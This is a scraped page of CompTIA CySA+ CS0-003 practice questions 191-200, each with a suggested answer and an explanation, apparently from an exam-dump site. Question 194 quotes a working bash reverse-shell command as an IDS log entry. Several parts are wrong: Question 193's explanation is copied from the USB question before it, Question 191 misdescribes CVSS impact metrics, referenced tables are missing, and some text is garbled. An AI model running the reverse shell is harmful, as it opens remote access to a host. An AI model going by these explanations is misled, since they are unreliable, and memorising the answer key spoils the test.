ExamGecko
Search Search Login
Home Home / CompTIA / CS0-003

CompTIA CS0-003 Practice Test - Questions Answers, Page 20

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).
An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?
Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets?
An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology?
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to analyze network traffic to search for malicious activity?

Question 191

Report
Export
Collapse

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A.
1
A.
1
Answers
B.
2
B.
2
Answers
C.
3
C.
3
Answers
D.
4
D.
4
Answers
Suggested answer: B

Explanation:

Vulnerability 2 has the highest impact metrics, specifically the highest attack vector (AV) and attack complexity (AC) values. This means that the vulnerability is more likely to be exploited and more difficult to remediate.

CVSS v3.1 Specification Document, section 2.1.1 and 2.1.2

The CVSS v3 Vulnerability Scoring System, section 3.1 and 3.2

Question 192

Report
Export
Collapse

A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A.
Conduct security awareness training on the risks of using unknown and unencrypted USBs.
A.
Conduct security awareness training on the risks of using unknown and unencrypted USBs.
Answers
B.
Write a removable media policy that explains that USBs cannot be connected to a company asset.
B.
Write a removable media policy that explains that USBs cannot be connected to a company asset.
Answers
C.
Check configurations to determine whether USB ports are enabled on company assets.
C.
Check configurations to determine whether USB ports are enabled on company assets.
Answers
D.
Review logs to see whether this exploitable vulnerability has already impacted the company.
D.
Review logs to see whether this exploitable vulnerability has already impacted the company.
Answers
Suggested answer: C

Explanation:

USB ports are a common attack vector that can be used to deliver malware, steal data, or compromise systems. The first step to mitigate this vulnerability is to check the configurations of the company assets and disable or restrict the USB ports if possible. This will prevent unauthorized devices from being connected and reduce the attack surface. The other options are also important, but they are not the first priority in this scenario.

CompTIA CySA+ CS0-003 Certification Study Guide, page 247

What are Attack Vectors: Definition & Vulnerabilities, section ''How to secure attack vectors''

Are there any attack vectors for a printer connected through USB in a Windows environment?, answer by user ''schroeder''

Question 193

Report
Export
Collapse

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A.
Deploy agents on all systems to perform the scans.
A.
Deploy agents on all systems to perform the scans.
Answers
B.
Deploy a central scanner and perform non-credentialed scans.
B.
Deploy a central scanner and perform non-credentialed scans.
Answers
C.
Deploy a cloud-based scanner and perform a network scan.
C.
Deploy a cloud-based scanner and perform a network scan.
Answers
D.
Deploy a scanner sensor on every segment and perform credentialed scans.
D.
Deploy a scanner sensor on every segment and perform credentialed scans.
Answers
Suggested answer: A

Explanation:

USB ports are a common attack vector that can be used to deliver malware, steal data, or compromise systems. The first step to mitigate this vulnerability is to check the configurations of the company assets and disable or restrict the USB ports if possible. This will prevent unauthorized devices from being connected and reduce the attack surface. The other options are also important, but they are not the first priority in this scenario.

CompTIA CySA+ CS0-003 Certification Study Guide, page 247

What are Attack Vectors: Definition & Vulnerabilities, section ''How to secure attack vectors''

Are there any attack vectors for a printer connected through USB in a Windows environment?, answer by user ''schroeder''

Question 194

Report
Export
Collapse

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A.
#!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo 'Malicious activity' Il echo 'OK'
A.
#!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo 'Malicious activity' Il echo 'OK'
Answers
B.
#!/bin/bash ps -fea | grep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
B.
#!/bin/bash ps -fea | grep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
Answers
C.
#!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
C.
#!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
Answers
D.
#!/bin/bash netstat -antp Igrep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
D.
#!/bin/bash netstat -antp Igrep 8080 >dev/null && echo 'Malicious activity' I| echo 'OK'
Answers
Suggested answer: D

Explanation:

The suspicious entry on the host-based IDS logs indicates that a reverse shell was executed on the host, which connects to the remote IP address 10.1.2.3 on port 8080. The shell script option D uses the netstat command to check if there is any active connection to that IP address and port, and prints ''Malicious activity'' if there is, or ''OK'' otherwise. This is the most accurate way to confirm if the reverse shell is still active, as the other options may not detect the connection or may produce false positives.

Reference CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 8: Incident Response, page 339. Reverse Shell Cheat Sheet, Bash section.

Question 195

Report
Export
Collapse

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A.
Hacktivist threat
A.
Hacktivist threat
Answers
B.
Advanced persistent threat
B.
Advanced persistent threat
Answers
C.
Unintentional insider threat
C.
Unintentional insider threat
Answers
D.
Nation-state threat
D.
Nation-state threat
Answers
Suggested answer: C

Explanation:

An unintentional insider threat is a type of network security threat that occurs when a legitimate user of the network unknowingly exposes the network to malicious activity, such as opening a phishing email or a malware-infected attachment from an unknown source. This can compromise the network security and allow attackers to access sensitive data or systems. The other options are not related to the threat concept of ensuring that all network users only open attachments from known sources.

Reference CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 1: Threat and Vulnerability Management, page 13. What is Network Security | Threats, Best Practices | Imperva, Network Security Threats and Attacks, Phishing section. Five Ways to Defend Against Network Security Threats, 2. Use Firewalls section.

Question 196

Report
Export
Collapse

A company has the following security requirements:

. No public IPs

* All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A.
VM_PRD_DB
A.
VM_PRD_DB
Answers
B.
VM_DEV_DB
B.
VM_DEV_DB
Answers
C.
VM_DEV_Web02
C.
VM_DEV_Web02
Answers
D.
VM_PRD_Web01
D.
VM_PRD_Web01
Answers
Suggested answer: D

Explanation:

This VM has a public IP and an open port 80, which violates the company's security requirements of no public IPs and no insecure ports/protocols. It also exposes the VM to potential attacks from the internet. This VM should be updated first to use a private IP and close the port 80, or use a secure protocol such as HTTPS.

Reference [CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition], Chapter 2: Cloud and Hybrid Environments, page 67. [What is a Public IP Address?] [What is Port 80?]

Question 197

Report
Export
Collapse

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
A.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
Answers
B.
AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2
B.
AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2
Answers
C.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
C.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
Answers
D.
AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5
D.
AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5
Answers
Suggested answer: A

Explanation:

This option represents the least impactful risk because it has the lowest base score among the four options, and it also requires high privileges, user interaction, and high attack complexity to exploit, which reduces the likelihood of a successful attack.

Question 198

Report
Export
Collapse

Which of the following should be updated after a lessons-learned review?

A.
Disaster recovery plan
A.
Disaster recovery plan
Answers
B.
Business continuity plan
B.
Business continuity plan
Answers
C.
Tabletop exercise
C.
Tabletop exercise
Answers
D.
Incident response plan
D.
Incident response plan
Answers
Suggested answer: D

Explanation:

A lessons-learned review is a process of evaluating the effectiveness and efficiency of the incident response plan after an incident or an exercise. The purpose of the review is to identify the strengths and weaknesses of the incident response plan, and to update it accordingly to improve the future performance and resilience of the organization. Therefore, the incident response plan should be updated after a lessons-learned review.

Question 199

Report
Export
Collapse

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A.
Insider threat
A.
Insider threat
Answers
B.
Ransomware group
B.
Ransomware group
Answers
C.
Nation-state
C.
Nation-state
Answers
D.
Organized crime
D.
Organized crime
Answers
Suggested answer: C

Question 200

Report
Export
Collapse

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

A.
Reconnaissance
A.
Reconnaissance
Answers
B.
Weaponization
B.
Weaponization
Answers
C.
Exploitation
C.
Exploitation
Answers
D.
Installation
D.
Installation
Answers
Suggested answer: B

Explanation:

Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a malicious payload to use against a target. In this case, the disgruntled open-source developer has created a logic bomb that will act as a wiper, which is a type of malware that destroys data on a system. This is an example of weaponization, as the developer has prepared a cyberweapon to sabotage the code repository.

Cyber Kill Chain | Lockheed Martin, which states: ''In the weaponization step, the adversary creates remote access malware weapon, such as a virus or worm, tailored to one or more vulnerabilities.''

The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which states: ''In the weaponization stage, all of the attacker's preparatory work culminates in the creation of malware to be used against an identified target.''

What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states: ''Weaponization: The attacker creates a malicious payload that will be delivered to the target.''

Total 368 questions
Go to page: of 37
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms